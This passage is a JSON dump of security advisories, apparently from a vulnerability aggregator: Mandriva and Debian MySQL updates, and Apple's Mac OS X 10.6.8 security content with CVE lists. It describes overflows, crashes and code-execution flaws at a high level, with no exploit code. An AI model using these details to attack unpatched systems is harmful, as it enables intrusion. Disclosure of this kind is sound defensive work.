columns could cause\r\n a server crash. &#40;Bug#54044&#41; &#40;CVE-2010-3680&#41;\r\n \r\n The updated packages have been patched to correct these issues.\r\n\r\n Update:\r\n\r\n Packages for 2009.1 was not provided with the MDVSA-2010:155\r\n advisory. This advisory provides the missing packages.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2008\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3683\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3682\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3681\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3679\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3678\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3677\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3680\r\n http://bugs.mysql.com/bug.php?id=52512\r\n http://bugs.mysql.com/bug.php?id=52711\r\n http://bugs.mysql.com/bug.php?id=54007\r\n http://bugs.mysql.com/bug.php?id=54393\r\n http://bugs.mysql.com/bug.php?id=54477\r\n http://bugs.mysql.com/bug.php?id=54575\r\n http://bugs.mysql.com/bug.php?id=54044\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Linux 2009.1:\r\n adfd92c6e4de06c22f7066b3880c7256 2009.1/i586/libmysql16-5.1.42-0.6mdv2009.1.i586.rpm\r\n 5961a072e203925f3e85895e71c6d114 2009.1/i586/libmysql-devel-5.1.42-0.6mdv2009.1.i586.rpm\r\n 87b2fb4508b2574b9610549cffe5d641 2009.1/i586/libmysql-static-devel-5.1.42-0.6mdv2009.1.i586.rpm\r\n 0bb6bc8032660f9441595a897e5e37c2 2009.1/i586/mysql-5.1.42-0.6mdv2009.1.i586.rpm\r\n aa383ed18610327d12846a66d6d8b5bd 2009.1/i586/mysql-bench-5.1.42-0.6mdv2009.1.i586.rpm\r\n 5abcaf797500228df411a10e9c1dd5a0 2009.1/i586/mysql-client-5.1.42-0.6mdv2009.1.i586.rpm\r\n 883b4e34ece270efb56c2eaa60a3a5f0 2009.1/i586/mysql-common-5.1.42-0.6mdv2009.1.i586.rpm\r\n 9fb48d28f8df4cb00aea4362837d2c3f 2009.1/i586/mysql-doc-5.1.42-0.6mdv2009.1.i586.rpm\r\n 67c086070030addfd770cc4d4c3db6bf 2009.1/i586/mysql-max-5.1.42-0.6mdv2009.1.i586.rpm\r\n 51e5a59f9aca3d05bbfb9a036f90ea54 2009.1/i586/mysql-ndb-extra-5.1.42-0.6mdv2009.1.i586.rpm\r\n d3da22f20148d43a625f3715f1d02be7 2009.1/i586/mysql-ndb-management-5.1.42-0.6mdv2009.1.i586.rpm\r\n a1d895e569730d42bed74d2b3b54ee0e 2009.1/i586/mysql-ndb-storage-5.1.42-0.6mdv2009.1.i586.rpm\r\n 9db83e6bd1b332ed2bcfa55c3d1cbf11 2009.1/i586/mysql-ndb-tools-5.1.42-0.6mdv2009.1.i586.rpm \r\n 39c0f1c0030455d78aa1f6c240e78f42 2009.1/SRPMS/mysql-5.1.42-0.6mdv2009.1.src.rpm\r\n\r\n Mandriva Linux 2009.1/X86_64:\r\n 81c56209ceffc1c4a8718beed142e0bd 2009.1/x86_64/lib64mysql16-5.1.42-0.6mdv2009.1.x86_64.rpm\r\n fca597b87c3f7d5d5ca40f6c24afe2c3 2009.1/x86_64/lib64mysql-devel-5.1.42-0.6mdv2009.1.x86_64.rpm\r\n 8287471cd70b341806f7e72a16222e68 2009.1/x86_64/lib64mysql-static-devel-5.1.42-0.6mdv2009.1.x86_64.rpm\r\n 5f4a264351859a08b259178c7fb6709e 2009.1/x86_64/mysql-5.1.42-0.6mdv2009.1.x86_64.rpm\r\n d5fd6ed95e52ffa75055b2e23ea880e1 2009.1/x86_64/mysql-bench-5.1.42-0.6mdv2009.1.x86_64.rpm\r\n 2621cfecdf4b53bfe363d99a9225ca31 2009.1/x86_64/mysql-client-5.1.42-0.6mdv2009.1.x86_64.rpm\r\n 1960228ef94d993486ab73a58323cc3e 2009.1/x86_64/mysql-common-5.1.42-0.6mdv2009.1.x86_64.rpm\r\n dd4821845d060dd6dac38217cc8cac66 2009.1/x86_64/mysql-doc-5.1.42-0.6mdv2009.1.x86_64.rpm\r\n 65432b5801c2ac0b4f2c536a816bc06d 2009.1/x86_64/mysql-max-5.1.42-0.6mdv2009.1.x86_64.rpm\r\n 3cf458db3d034e5998bccb70c006b71a 2009.1/x86_64/mysql-ndb-extra-5.1.42-0.6mdv2009.1.x86_64.rpm\r\n dea28a0be7cfcd99d942ce22f7999308 2009.1/x86_64/mysql-ndb-management-5.1.42-0.6mdv2009.1.x86_64.rpm\r\n 45329f869ffee6b497ad73da0a81019f 2009.1/x86_64/mysql-ndb-storage-5.1.42-0.6mdv2009.1.x86_64.rpm\r\n 72e2f6029c889723d0f003ffdbf007d1 2009.1/x86_64/mysql-ndb-tools-5.1.42-0.6mdv2009.1.x86_64.rpm \r\n 39c0f1c0030455d78aa1f6c240e78f42 2009.1/SRPMS/mysql-5.1.42-0.6mdv2009.1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_&#40;at&#41;_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n &lt;security*mandriva.com&gt;\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 &#40;GNU/Linux&#41;\r\n\r\niD8DBQFM2AekmqjQ0CJFipgRAqwGAJ0dZsRuXRZ1OfiVCwbWUNj3i3zo4ACgwnsn\r\naN2rtXXq0VzlsNd0DLVdRvw=\r\n=/o8P\r\n-----END PGP SIGNATURE-----", "edition": 1, "reporter": "Securityvulns", "published": "2010-11-09T00:00:00", "title": "[ MDVSA-2010:155-1 ] mysql", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:37", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2010-3680", "CVE-2010-3678", "CVE-2010-3681", "CVE-2010-3682", "CVE-2010-3679", "CVE-2010-2008", "CVE-2010-3683", "CVE-2010-3677"], "modified": "2010-11-09T00:00:00", "id": "SECURITYVULNS:DOC:25096", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25096", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:41", "references": [], "description": "About the security content of Mac OS X v10.6.8 and Security Update 2011-004\r\n\r\n Last Modified: June 23, 2011\r\n Article: HT4723\r\n\r\nEmail this article\r\nPrint this page\r\nSummary\r\n\r\nThis document describes of Mac OS X v10.6.8 and Security Update 2011-004, which can be downloaded and installed via Software Update preferences, or from Apple Downloads.\r\n\r\nFor the protection of our customers, Apple does not disclose, discuss, or confirm security issues until a full investigation has occurred and any necessary patches or releases are available. To learn more about Apple Product Security, see the Apple Product Security website.\r\n\r\nFor information about the Apple Product Security PGP Key, see &quot;How to use the Apple Product Security PGP Key.&quot;\r\n\r\nWhere possible, CVE IDs are used to reference the vulnerabilities for further information.\r\n\r\nTo learn about other Security Updates, see &quot;Apple Security Updates.&quot;\r\nProducts Affected\r\n\r\nMac OS X 10.6, Product Security\r\nMac OS X v10.6.8 and Security Update 2011-004\r\n\r\n AirPort\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8\r\n\r\n Impact: When connected to Wi-Fi, an attacker on the same network may be able to cause a system reset\r\n\r\n Description: An out of bounds memory read issue existed in the handling of Wi-Fi frames. When connected to Wi-Fi, an attacker on the same network may be able to cause a system reset. This issue does not affect Mac OS X v10.6\r\n\r\n CVE-ID\r\n\r\n CVE-2011-0196\r\n\r\n App Store\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.7, Mac OS X Server v10.6 through v10.6.7\r\n\r\n Impact: The user&#39;s AppleID password may be logged to a local file\r\n\r\n Description: In certain circumstances, App Store may log the user&#39;s AppleID password to a file that is not readable by other users on the system. This issue is addressed through improved handling of credentials.\r\n\r\n CVE-ID\r\n\r\n CVE-2011-0197 : Paul Nelson\r\n\r\n ATS\r\n\r\n Available for: Mac OS X v10.6 through v10.6.7, Mac OS X Server v10.6 through v10.6.7\r\n\r\n Impact: Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution\r\n\r\n Description: A heap buffer overflow issue existed in the handling of TrueType fonts. Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution.\r\n\r\n CVE-ID\r\n\r\n CVE-2011-0198 : Harry Sintonen, Marc Schoenefeld of the Red Hat Security Response Team\r\n\r\n Certificate Trust Policy\r\n\r\n Available for: Mac OS X v10.6 through v10.6.7, Mac OS X Server v10.6 through v10.6.7\r\n\r\n Impact: An attacker with a privileged network position may intercept user credentials or other sensitive information\r\n\r\n Description: An error handling issue existed in the Certificate Trust Policy. If an Extended Validation &#40;EV&#41; certificate has no OCSP URL, and CRL checking is enabled, the CRL will not be checked and a revoked certificate may be accepted as valid. This issue is mitigated as most EV certificates specify an OCSP URL.\r\n\r\n CVE-ID\r\n\r\n CVE-2011-0199 : Chris Hawk and Wan-Teh Chang of Google\r\n\r\n ColorSync\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8\r\n\r\n Impact: Viewing a maliciously crafted image with an embedded ColorSync profile may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An integer overflow existed in the handling of images with an embedded ColorSync profile, which may lead to a heap buffer overflow. Opening a maliciously crafted image with an embedded ColorSync profile may lead to an unexpected application termination or arbitrary code execution.\r\n\r\n CVE-ID\r\n\r\n CVE-2011-0200 : binaryproof working with TippingPoint&#39;s Zero Day Initiative\r\n\r\n CoreFoundation\r\n\r\n Available for: Mac OS X v10.6 through v10.6.7, Mac OS X Server v10.6 through v10.6.7\r\n\r\n Impact: Applications that use the CoreFoundation framework may be vulnerable to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An off-by-one buffer overflow issue existed in the handling of CFStrings. Applications that use the CoreFoundation framework may be vulnerable to an unexpected application termination or arbitrary code execution.\r\n\r\n CVE-ID\r\n\r\n CVE-2011-0201 : Harry Sintonen\r\n\r\n CoreGraphics\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.7, Mac OS X Server v10.6 through v10.6.7\r\n\r\n Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An integer overflow issue existed in the handling of Type 1 fonts. Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution.\r\n\r\n CVE-ID\r\n\r\n CVE-2011-0202 : Cristian Draghici of Modulo Consulting, Felix Grobert of the Google Security Team\r\n\r\n FTP Server\r\n\r\n Available for: Mac OS X Server v10.6 through v10.6.7\r\n\r\n Impact: A person with FTP access may list files on the system\r\n\r\n Description: A path validation issue existed in xftpd. A person with FTP access may perform a recursive directory listing starting from the root, including directories that are not shared for FTP. The listing will eventually include any file that would be accessible to the FTP user. The contents of files are not disclosed. This issue is addressed through improved path validation. This issue only affects Mac OS X Server systems.\r\n\r\n CVE-ID\r\n\r\n CVE-2011-0203 : team karlkani\r\n\r\n ImageIO\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.7, Mac OS X Server v10.6 through v10.6.7\r\n\r\n Impact: Viewing a maliciously crafted TIFF image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A heap buffer overflow existed in ImageIO&#39;s handling of TIFF images. Viewing a maliciously crafted TIFF image may lead to an unexpected application termination or arbitrary code execution.\r\n\r\n CVE-ID\r\n\r\n CVE-2011-0204 : Dominic Chell of NGS Secure\r\n\r\n ImageIO\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.7, Mac OS X Server v10.6 through v10.6.7\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A heap buffer overflow issue existed in ImageIO&#39;s handling of JPEG2000 images. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution.\r\n\r\n CVE-ID\r\n\r\n CVE-2011-0205 : Harry Sintonen\r\n\r\n International Components for Unicode\r\n\r\n Available for: Mac OS X v10.6 through v10.6.7, Mac OS X Server v10.6 through v10.6.7\r\n\r\n Impact: Applications that use ICU may be vulnerable to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A buffer overflow issue existed in ICU&#39;s handling of uppercase strings. Applications that use ICU may be vulnerable to an unexpected application termination or arbitrary code execution.\r\n\r\n CVE-ID\r\n\r\n CVE-2011-0206 : David Bienvenu of Mozilla\r\n\r\n Kernel\r\n\r\n Available for: Mac OS X v10.6 through v10.6.7, Mac OS X Server v10.6 through v10.6.7\r\n\r\n Impact: A local user may be able to cause a system reset\r\n\r\n Description: A null dereference issue existed in the handling of IPV6 socket options. A local user may be able to cause a system reset.\r\n\r\n CVE-ID\r\n\r\n CVE-2011-1132 : Thomas Clement of Intego\r\n\r\n Libsystem\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.7, Mac OS X Server v10.6 through v10.6.7\r\n\r\n Impact: Applications which use the glob&#40;3&#41; API may be vulnerable to a denial of service\r\n\r\n Description: Applications which use the glob&#40;3&#41; API may be vulnerable to a denial of service. If the glob pattern comes from untrusted input, the application may hang or use excessive CPU resources. This issue is addressed through improved validation of glob patterns.\r\n\r\n CVE-ID\r\n\r\n CVE-2010-2632 : Maksymilian Arciemowicz\r\n\r\n libxslt\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.7, Mac OS X Server v10.6 through v10.6.7\r\n\r\n Impact: Visiting a maliciously crafted website may lead to the disclosure of addresses on the heap\r\n\r\n Description: libxslt&#39;s implementation of the generate-id&#40;&#41; XPath function disclosed the address of a heap buffer. Visiting a maliciously crafted website may lead to the disclosure of addresses on the heap. This issue is addressed by generating an ID based on the difference between the addresses of two heap buffers.\r\n\r\n CVE-ID\r\n\r\n CVE-2011-0195 : Chris Evans of the Google Chrome Security Team\r\n\r\n MobileMe\r\n\r\n Available for: Mac OS X v10.6 through v10.6.7, Mac OS X Server v10.6 through v10.6.7\r\n\r\n Impact: An attacker with a privileged network position may read a user&#39;s MobileMe email aliases\r\n\r\n Description: When communicating with MobileMe to determine a user&#39;s email aliases, Mail will make requests over HTTP. As a result, an attacker with a privileged network position may read a user&#39;s MobileMe email aliases. This issue is addressed by using SSL to access the user&#39;s email aliases.\r\n\r\n CVE-ID\r\n\r\n CVE-2011-0207 : Aaron Sigel of vtty.com\r\n\r\n MySQL\r\n\r\n Available for: Mac OS X Server v10.5.8, Mac OS X Server v10.6 through v10.6.7\r\n\r\n Impact: Multiple vulnerabilities in MySQL 5.0.91\r\n\r\n Description: MySQL is updated to version 5.0.92 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. MySQL is only provided with Mac OS X Server systems. Further information is available via the MySQL web site at http://dev.mysql.com/doc/refman/5.0/en/news-5-0-92.html\r\n\r\n CVE-ID\r\n\r\n CVE-2010-3677\r\n\r\n CVE-2010-3682\r\n\r\n CVE-2010-3833\r\n\r\n CVE-2010-3834\r\n\r\n CVE-2010-3835\r\n\r\n CVE-2010-3836\r\n\r\n CVE-2010-3837\r\n\r\n CVE-2010-3838\r\n\r\n OpenSSL\r\n\r\n Available for: Mac OS X v10.6 through v10.6.7, Mac OS X Server v10.6 through v10.6.7\r\n\r\n Impact: Multiple vulnerabilities in OpenSSL\r\n\r\n Description: Multiple vulnerabilities existed in OpenSSL, the most serious of which may lead to arbitrary code execution. These issues are addressed by updating OpenSSL to version 0.9.8r.\r\n\r\n CVE-ID\r\n\r\n CVE-2009-3245\r\n\r\n CVE-2010-0740\r\n\r\n CVE-2010-3864\r\n\r\n CVE-2010-4180\r\n\r\n CVE-2011-0014\r\n\r\n patch\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.7, Mac OS X Server v10.6 through v10.6.7\r\n\r\n Impact: Running patch on a maliciously crafted patch file may cause arbitrary files to be created or overwritten\r\n\r\n Description: A directory traversal issue existed in GNU patch. Running patch on a maliciously crafted patch file may cause arbitrary files to be created or overwritten. This issue is addressed through improved validation of patch files.\r\n\r\n CVE-ID\r\n\r\n CVE-2010-4651\r\n\r\n QuickLook\r\n\r\n Available for: Mac OS X v10.6 through v10.6.7, Mac OS X Server v10.6 through v10.6.7\r\n\r\n Impact: Downloading a maliciously crafted Microsoft Office file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue existed in QuickLook&#39;s handling of Microsoft Office files. Downloading a maliciously crafted Microsoft Office file may lead to an unexpected application termination or arbitrary code execution. This issue does not affect systems prior to Mac OS X v10.6.\r\n\r\n CVE-ID\r\n\r\n CVE-2011-0208 : Tobias Klein working with iDefense VCP\r\n\r\n QuickTime\r\n\r\n Available for: Mac OS X v10.6 through v10.6.7, Mac OS X Server v10.6 through v10.6.7\r\n\r\n Impact: Viewing a maliciously crafted WAV file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An integer overflow existed in QuickTime&#39;s handling of RIFF WAV files. Viewing a maliciously crafted WAV file may lead to an unexpected application termination or arbitrary code execution.\r\n\r\n CVE-ID\r\n\r\n CVE-2011-0209 : Luigi Auriemma working with TippingPoint&#39;s Zero Day Initiative\r\n\r\n QuickTime\r\n\r\n Available for: Mac OS X v10.6 through v10.6.7, Mac OS X Server v10.6 through v10.6.7\r\n\r\n Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue existed in QuickTime&#39;s handling of sample tables in QuickTime movie files. Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution.\r\n\r\n CVE-ID\r\n\r\n CVE-2011-0210 : Honggang Ren of Fortinet&#39;s FortiGuard Labs\r\n\r\n QuickTime\r\n\r\n Available for: Mac OS X v10.6 through v10.6.7, Mac OS X Server v10.6 through v10.6.7\r\n\r\n Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An integer overflow existed in QuickTime&#39;s handling of movie files. Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution.\r\n\r\n CVE-ID\r\n\r\n CVE-2011-0211 : Luigi Auriemma working with TippingPoint&#39;s Zero Day Initiative\r\n\r\n QuickTime\r\n\r\n Available for: Mac OS X v10.6 through v10.6.7, Mac OS X Server v10.6 through v10.6.7\r\n\r\n Impact: Viewing a maliciously crafted PICT image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A buffer overflow existed in QuickTime&#39;s handling of PICT images. Viewing a maliciously crafted PICT image may lead to an unexpected application termination or arbitrary code execution.\r\n\r\n CVE-ID\r\n\r\n CVE-2010-3790 : Subreption LLC working with TippingPoint&#39;s Zero Day Initiative\r\n\r\n QuickTime\r\n\r\n Available for: Mac OS X v10.6 through v10.6.7, Mac OS X Server v10.6 through v10.6.7\r\n\r\n Impact: Viewing a maliciously crafted JPEG file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A buffer overflow existed in QuickTime&#39;s handling of JPEG files. Viewing a maliciously crafted JPEG file may lead to an unexpected application termination or arbitrary code execution.\r\n\r\n CVE-ID\r\n\r\n CVE-2011-0213 : Luigi Auriemma working with iDefense\r\n\r\n Samba\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8\r\n\r\n Impact: If SMB file sharing is enabled, a remote attacker may cause a denial of service or arbitrary code execution\r\n\r\n Description: A stack buffer overflow existed in Samba&#39;s handling of Windows Security IDs. If SMB file sharing is enabled, a remote attacker may cause a denial of service or arbitrary code execution. For Mac OS X v10.6 systems, this issue is addressed in Mac OS X 10.6.7.\r\n\r\n CVE-ID\r\n\r\n CVE-2010-3069\r\n\r\n Samba\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.7, Mac OS X Server v10.6 through v10.6.7\r\n\r\n Impact: If SMB file sharing is enabled, a remote attacker may cause a denial of service or arbitrary code execution\r\n\r\n Description: A memory corruption issue existed in Samba&#39;s handling of file descriptors. If SMB file sharing is enabled, a remote attacker may cause a denial of service or arbitrary code execution.\r\n\r\n CVE-ID\r\n\r\n CVE-2011-0719 : Volker Lendecke of SerNet\r\n\r\n servermgrd\r\n\r\n Available for: Mac OS X Server v10.5.8, Mac OS X Server v10.6 through v10.6.7\r\n\r\n Impact: A remote attacker may be able to read arbitrary files from the system\r\n\r\n Description: An XML External Entity issue exists in servermgrd&#39;s handling of XML-RPC requests. This issue is addressed by removing servermgrd&#39;s XML-RPC interface. This issue only affects Mac OS X Server systems.\r\n\r\n CVE-ID\r\n\r\n CVE-2011-0212 : Apple\r\n\r\n subversion\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.7, Mac OS X Server v10.6 through v10.6.7\r\n\r\n Impact: If an http based Subversion server is configured, a remote attacker may be able to cause a denial of service\r\n\r\n Description: A null dereference issue existed in Subversion&#39;s handling of lock tokens sent over HTTP. If an http based Subversion server is configured, a remote attacker may be able to cause a denial of service. For Mac OS X v10.6 systems, Subversion is updated to version 1.6.6. For Mac OS X v10.5.8 systems, the issue is addressed through additional validation of lock tokens. Further information is available via the Subversion web site at http://subversion.tigris.org/\r\n\r\n CVE-ID\r\n\r\n CVE-2011-0715\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2011-07-04T00:00:00", "title": "About the security content of Mac OS X v10.6.8 and Security Update 2011-004", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:41", "vector": "NONE", "value": 9.3}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2010-4651", "CVE-2011-0197", "CVE-2011-0196", "CVE-2010-0740", "CVE-2011-0211", "CVE-2011-0202", "CVE-2011-0199", "CVE-2010-3790", "CVE-2011-0206", "CVE-2011-0204", "CVE-2010-3837", "CVE-2011-0719", "CVE-2011-0201", "CVE-2010-2632", "CVE-2010-3835", "CVE-2011-0210", "CVE-2011-1132", "CVE-2010-3833", "CVE-2010-4180", "CVE-2011-0208", "CVE-2011-0203", "CVE-2011-0212", "CVE-2009-3245", "CVE-2011-0213", "CVE-2011-0014", "CVE-2010-3682", "CVE-2010-3836", "CVE-2011-0195", "CVE-2010-3677", "CVE-2011-0715", "CVE-2010-3834", "CVE-2011-0200", "CVE-2010-3838", "CVE-2011-0205", "CVE-2010-3864", "CVE-2011-0198", "CVE-2011-0209", "CVE-2011-0207", "CVE-2010-3069"], "modified": "2011-07-04T00:00:00", "id": "SECURITYVULNS:DOC:26596", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26596", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:43", "references": ["https://vulners.com/securityvulns/securityvulns:doc:26606", "https://vulners.com/securityvulns/securityvulns:doc:26597", "https://vulners.com/securityvulns/securityvulns:doc:26608", "https://vulners.com/securityvulns/securityvulns:doc:26598", "https://vulners.com/securityvulns/securityvulns:doc:26612", "https://vulners.com/securityvulns/securityvulns:doc:26607", "https://vulners.com/securityvulns/securityvulns:doc:26596"], "description": "DoS conditions, buffer overflows, information leaks, code execution in different subsystems.", "edition": 1, "reporter": "APPLE", "published": "2011-07-06T00:00:00", "title": "Apple Mac OS X multiple security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:43", "vector": "NONE", "value": 9.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "MacOS X", "version": "10.6", "operator": "eq"}], "cvelist": ["CVE-2010-4651", "CVE-2011-0197", "CVE-2011-0196", "CVE-2010-0740", "CVE-2011-0211", "CVE-2011-0202", "CVE-2011-0199", "CVE-2010-3790", "CVE-2011-0206", "CVE-2011-0204", "CVE-2010-3837", "CVE-2011-0719", "CVE-2011-0201", "CVE-2010-2632", "CVE-2010-3835", "CVE-2011-0210", "CVE-2011-1132", "CVE-2010-3833", "CVE-2010-4180", "CVE-2011-0208", "CVE-2011-0203", "CVE-2011-0212", "CVE-2009-3245", "CVE-2011-0213", "CVE-2011-0014", "CVE-2010-3682", "CVE-2010-3836", "CVE-2011-0195", "CVE-2010-3677", "CVE-2011-0715", "CVE-2010-3834", "CVE-2011-0200", "CVE-2010-3838", "CVE-2011-0205", "CVE-2010-3864", "CVE-2011-0198", "CVE-2011-0209", "CVE-2011-0207", "CVE-2010-3069"], "modified": "2011-07-06T00:00:00", "id": "SECURITYVULNS:VULN:11754", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11754", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2018-10-16T22:14:47", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "5", "packageVersion": "5.0.51a-24+lenny5", "arch": "all", "packageFilename": "mysql-server-5.0_5.0.51a-24+lenny5_all.deb", "packageName": "mysql-server-5.0", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "5.0.51a-24+lenny5", "arch": "all", "packageFilename": "mysql-dfsg-5.0_5.0.51a-24+lenny5_all.deb", "packageName": "mysql-dfsg-5.0", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "5.0.51a-24+lenny5", "arch": "all", "packageFilename": "libmysqlclient15-dev_5.0.51a-24+lenny5_all.deb", "packageName": "libmysqlclient15-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "5.0.51a-24+lenny5", "arch": "all", "packageFilename": "mysql-common_5.0.51a-24+lenny5_all.deb", "packageName": "mysql-common", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "5.0.51a-24+lenny5", "arch": "all", "packageFilename": "libmysqlclient15off_5.0.51a-24+lenny5_all.deb", "packageName": "libmysqlclient15off", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "5.0.51a-24+lenny5", "arch": "all", "packageFilename": "mysql-client-5.0_5.0.51a-24+lenny5_all.deb", "packageName": "mysql-client-5.0", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "5.0.51a-24+lenny5", "arch": "all", "packageFilename": "mysql-client_5.0.51a-24+lenny5_all.deb", "packageName": "mysql-client", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "5.0.51a-24+lenny5", "arch": "all", "packageFilename": "mysql-server_5.0.51a-24+lenny5_all.deb", "packageName": "mysql-server", "operator": "lt"}], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2143-1 security@debian.org\nhttp://www.debian.org/security/ Giuseppe Iuculano\nJanuary 14, 2011 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mysql-dfsg-5.0\nVulnerability : several vulnerabilities\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2010-3677 CVE-2010-3680 CVE-2010-3681 CVE-2010-3682 CVE-2010-3833 CVE-2010-3834 CVE-2010-3835 CVE-2010-3836 CVE-2010-3837 CVE-2010-3838 CVE-2010-3840\n\n\nSeveral vulnerabilities have been discovered in the MySQL\ndatabase server.\nThe Common Vulnerabilities and Exposures project identifies the\nfollowing problems:\n\n\nCVE-2010-3677\n\n It was discovered that MySQL allows remote authenticated users to cause\n a denial of service (mysqld daemon crash) via a join query that uses a\n table with a unique SET column.\n\n\nCVE-2010-3680\n\n It was discovered that MySQL allows remote authenticated users to cause\n a denial of service (mysqld daemon crash) by creating temporary tables\n while using InnoDB, which triggers an assertion failure.\n\n\nCVE-2010-3681\n\n It was discovered that MySQL allows remote authenticated users to cause\n a denial of service (mysqld daemon crash) by using the HANDLER interface\n and performing &quot;alternate reads from two indexes on a table,&quot; which\n triggers an assertion failure.\n\n\nCVE-2010-3682\n\n It was discovered that MySQL incorrectly handled use of EXPLAIN with\n certain queries.\n An authenticated user could crash the server.\n\n\nCVE-2010-3833\n\n It was discovered that MySQL incorrectly handled propagation during\n evaluation of arguments to extreme-value functions.\n An authenticated user could crash the server.\n\n\nCVE-2010-3834\n\n It was discovered that MySQL incorrectly handled materializing a derived\n table that required a temporary table for grouping.\n An authenticated user could crash the server.\n\n\nCVE-2010-3835\n\n It was discovered that MySQL incorrectly handled certain user-variable\n assignment expressions that are evaluated in a logical expression context.\n An authenticated user could crash the server.\n\n\nCVE-2010-3836\n\n It was discovered that MySQL incorrectly handled pre-evaluation of LIKE\n predicates during view preparation.\n An authenticated user could crash the server.\n\n\nCVE-2010-3837\n\n It was discovered that MySQL incorrectly handled using GROUP_CONCAT()\n and WITH 